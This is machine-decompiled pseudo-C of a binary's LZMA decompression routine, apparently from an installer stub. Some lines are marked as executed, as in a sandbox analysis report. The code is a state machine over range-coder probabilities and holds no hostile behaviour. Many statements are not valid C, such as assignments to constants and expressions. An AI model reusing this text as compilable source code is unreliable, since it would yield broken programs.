				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004074A1))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
